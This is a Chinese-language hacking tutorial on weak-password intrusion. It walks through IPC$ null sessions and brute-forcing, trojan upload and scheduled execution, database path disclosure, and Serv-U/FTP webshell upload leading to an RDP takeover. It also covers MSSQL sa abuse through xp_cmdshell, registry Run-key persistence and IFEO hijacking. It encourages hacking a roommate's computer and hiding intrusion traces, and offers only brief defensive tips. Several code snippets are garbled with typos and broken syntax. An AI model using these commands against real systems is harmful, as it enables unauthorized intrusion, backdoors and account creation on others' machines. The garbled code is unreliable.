web入侵二之弱口令攻击及其他

一、什么是弱口令

就是说由常用数字、字母、字符等组合成的，容易被别人通过简单及平常的思维方式就能猜到的密码，利用弱口令结合计算机系统等漏洞可以做到入侵的事半功倍的效果

二、共享入侵--IPC$

IPC$是共享“命名管道”资源，它是为了让进程间通信而开放的命令管道，可以通过验证用户名和密码获取相应的权限，在远程管理计算机和查看计算机的共享资源是使用，利用IPC$,攻击者甚至可以与目标主机建立一个空的连接而无需用户名和密码，前提是对方开启了IPC$共享。

1、如何利用ｉＰＣ＄入侵

　第一步，利用空连接得到目标主机上的用户列表,使用命令，例如：net use
\\192.168.1.200\ipc$"/user:"" 建立连接，

第二步，采用爆破方法扫描得到用户名和密码 ,其实就是net use z:\\192.168.1.200\c$,不断的暴力尝试

第三步，得到用户名和密码后 登录对方电脑，net use
\\192.168.1.200\ipc$ "test" /user:administrator,net use z:\\192.168.1.203\ipc$

第四步，打开我的电脑发现多了一个z盘，其实就是目标机的c盘内容了

第五步，上传木马后门，exe文件或者bat文件都可以，就是复制粘贴就行了

第六步，执行木马后门，利用at命令设定时间运行该程序，先net time
\\192.168.1.203命令查看系统时间，而后领用at命令at
\\192.168.1.203 21:05 c:\test.bat,就可以让目标机在预定时间只用木马，而后沦为肉鸡。

2、IPC$入侵注意事项

第一，不要把\写成了/

第二，在建立空连接的时候，引号的输入应在英文状态下输入

3、如何防范IPC$入侵

第一，cmd下输入命令：net share 看看自己的机器开了多少共享

第二，再用net share 共享名/del删除共享

第三，最彻底的办法就是禁用IPC$服务，命令为：net stop server,而后输入y即可

以上就是IPC$入侵的大致过程，不妨自己虚拟机环境下自己动手运行一下，或者黑一下室友的机子。。。。。。。。。。。

三、目录浏览

目录浏览是基于web服务的，也就是说如果web服务配置不当，就可以导致攻击者浏览web目录下的任意文件和目录。如IIS、apache、tomcat等web服务器都有可能存在这样的问题。

四、暴库

暴库，就是通过一些技术手段或者程序漏洞得到数据库的地址，并将数据非法下载到本地。这里要了解两个概念：相对路径（如D:/text/text.txt）和绝对路径(如:/text/text.txt)。

暴库有两个方法来实现，第一个就是利用%5c，另外一个就是conn.asp暴库。

1、%5c暴库

简单的说就是在打开网页时，将/换成%5c，然后提交就可以得到数据库地址了，但必须是需要调用数据库的页面，比如登录等，

原因：

这和IIS的解析有关，%5c是\的十六进制代码，也就是\的另一种表达方式，我们在提交网页时，IE会自动把%5c转换成/，从而得到同一地址，可是ISS并不这样认为，应为来了一个%5c（也就是/),虽然IE解析的时候是一个意思，可在ISS这里却认为访问到\这里就到了根目录所在的地方，而不再往上解析了。

2、con.asp 暴库

同%5c的方法一样，%5c是利用绝对路径出错，而con.asp是利用相对路径出错。

例如，conn.sap代码：

<%

db="kerally database/kenerldatabase.mdb"

constr="DB!"+server.mappath(do)+"DefaultDir=DRIVER{Microsoft Acess Driver(*mb)|.Pwd=kenanel"

set com=server.createObject("ADODB ,Connection"

con.open.coratr

Sub.rsclose()

rs.Close()

set rs=nothing

End sub

sub.conclose()

conn.close()

set conn=nothing

End sub

%>

第一句中，调用数据库相对路径是”kenatlybdatabase/kenandatabase.mdb"..conn.asp文件一般是起调用数据库作用的，如果调用文件和conn.asp文件的相对位置发生变化了，那么就会出现暴库。

3、暴库的防范

（1）及时更新发现过的漏洞，也就是把IIS升级到最新版本

（2）在conn.asp暴库中，限制文件暴库，也就是让他不暴库继续执行，加入一些代码即可

五、弱口令攻击

弱口令，设计到电脑的各种口令设置简单的后果，比如FTP、SSH灯各种服务，抑或管理平台的口令，都可能被攻击者不费任何力气获得，从而导致服务器的沦陷。

下面就把一些常用的基于大众的弱口令方法描写出来。

1、FTP弱口令

FTP（FILE TRANSFER Protocol）是文件传输协议的简称，用于Internet上传文件的双向传输。同时，它也是一个应用程序，用户可以通过它把自己的PC机与各地的所有运行FTP协议的服务器相连，访问服务器上的大量信息。

例如，我们可以利用FTP读取、上传、删除、创建文件或者程序，如果得到了一个权限很大的FTP账号，后果是比较严重的，现在比较流行的还有SerV-u工具。

第一步，连接ftp服务器，方式：ftp 服务器IP地址

第二部，使用hscan工具扫描开始IP和结束IP，也可以挑选要扫描的IP，这里我们输入目的ftp服务器IP

第三部，扫描结束后，如果对方是弱口令，我们将得到连接ftp服务器的用户名和密码

第四步，如果对方使用的是Serv-u，可以直接加一个系统账户，命令为：quote site exec net user guest /avtive:yes（这一句的作用是把系统内置账户guest激活），如果serv-u没有权限执行命令的话，我们就要换一种思路了

第五步，既然无法直接添加系统用户，可以先使用dir命令看一下有什么文件，如果查看到admin、upload这样目录，还有index.htm，这里就要注意啦，很可能一个web目录，此时我们可以穿一个后门asp脚本就可能得到一个shell.

第六步，找到思路后，我们要先知道后门被传到哪里了，也就是说我们要能通过url连接到我们的后门地址，先把它的index下载到本地看一下里面是什么内容，命令为：

get index.htm c:\index.htm，就是把index.htm文件下载到本机c盘里面。

第七步，根据内容找到服务器的URL，这个主要通过社工，如百度等

第八步，直接通过ftp上传一个asp脚本木马上去，命令为：put F:\web木马\asp马\dama.asp。

第九步，接着打开http://www.xx.com/dama.asp,输入后门密码，这个shell自带serv-u提权功能，点击serv-u提权，然后添加用户即可。

第十步，占领3389端口，mstsc 输入用户名和密码，这样就成功占领服务器的桌面了。

注意：

第一，得到ftp密码后如果不能直接利用，不要死盯一点，一般ftp服务的都会有web服务，应该把目光放大一点，充分利用资源

第二，就是要利用尽可能多的方法来收集对方的信息

第三，隐藏自己的入侵痕迹，你懂得。

2、基于MSSQL弱口令的入侵

MSSQL其实是一个关系数据库管理系统，是Microsoft推出的新一代数据管理与分析软件，它是一个全面的、集成的、端到端的数据解决方案，为企业中的用户提供了一个安全，可靠和高效的平台，用于企业数据管理和商业智能应用，所以适合一些大型网站的使用

如何利用已知用户名和密码的情况下拿到服务器权限

相关知识：

1、 在SQL server中，主要有两种角色类型：服务器角色与数据库角色，攻击者在攻击时，会遇到三种角色：sa权限、db_owner权限和public权限

（1）sa权限

是system和Admin的缩写，为MSSQL数据库的默认系统账号，具有最高权限，第一次安装MSSQL时，如果sa密码过于简单，攻击者很可能用hscan或者x-scan等暴力破解工具通过字典爆破的方式得到用户名和密码，然后再通过sql连接器灯工具连到1433端口（MSSQL默认端口），利用扩展存储执行系统命令。

（2）Db_owner权限：

其中db是database的缩写，owner是拥有者的意思。从字面上我们就可以猜出db_owner是指某个数据库的拥有者，它拥有对数据库的修改、删除等大部分存储过程的权限，但是涉及到系统敏感操作时，它是没有权限的，如前面提到的xp_cmdshell等

（3）public权限

public的权限相对较小，不过还是有可以利用到的地方比如目录、建立临时表等。

第一步，假如我们已经扫描到一台拥有弱口令的机器，用户名是sa，口令为admin，我们首先通过sqltools.exe连接上去试一下，不然就试一下MSSQL连接器.exe，或者sql查询分析器分离版本连接。

第二步，执行exec xp_cmdshell ‘net user test test /add'、exec xp_cmdshell、net localgroup adminis-trators text /add'命令成功添加具有管理员权限的用户

第三步，假如管理员做了手脚，把xp_cmdshell这个存储过程删了，或者关闭了

开启xp_cmdshell：

EXEC sp__configure 'show advanced options',1,RECONFIGURE;:EXEC sp_configre 'xp_configure' 1 RECONFIGLRE；

恢复xp_cmdshell:

EXEC sp_addexiendeproc xp_cmdshell @dllname='xplog70.dll

第四步，操作注册表提权主要有两种思路，一种就是利用注册表启动项，执行以下代码

exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','Software\microsoft\windows\currentversion\policies\explorer\run','running','REG_SZ','c:\windows\system32\cmd.exe /c net user 1st 1st /add'

这样只要等待服务器重启就会运行代码，从而添加一个用户名和密码都为1st的用户。既然能操作注册表了，我们就可以用镜像劫持之类的技术来达到不需要重启就可以直接占领3389的目的。

第五步，了解镜像劫持，利用其渗透

镜像劫持（IFEO)就是image file exeution options,它位于注册表HKEY_LOCAL_MACHINE\SOFTWRE\Microsoft\Windows NT\CurrentVersion\CurrentVersion\Image File Executions，最关键的是，这个键值下有一个Debugger参数，“调试器",它是IFEO里被第一个被处理的参数，其作用如下：

系统如果发现某个程序文件在IFEO列表中，它就会首先来读取 Debugger参数，如果该参数不为空，系统就会把Debugger参数里指定的程序文件名作为用户尝试启动的程序执行请求来处理。其本身目的是双击程序文件就进入调试，但是黑客如果换成cmd.exe或者exploer.exe就可以直接执行系统命令了，代码如下

exec master.dbo.xp-regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\Micosoft\\Windows NT\\CurentVersion\\Image File Exection\\setc.exe','debugger','REG_SZ','C:\\windows\\exploer.exe'

第六步，进入桌面程序 添加登录账号。

3.基于MySql弱口令的入侵 4 基于oracle弱口令的入侵 5。tomcat弱口令的入侵 6、第三方管理工具radmin和vnc弱口令入侵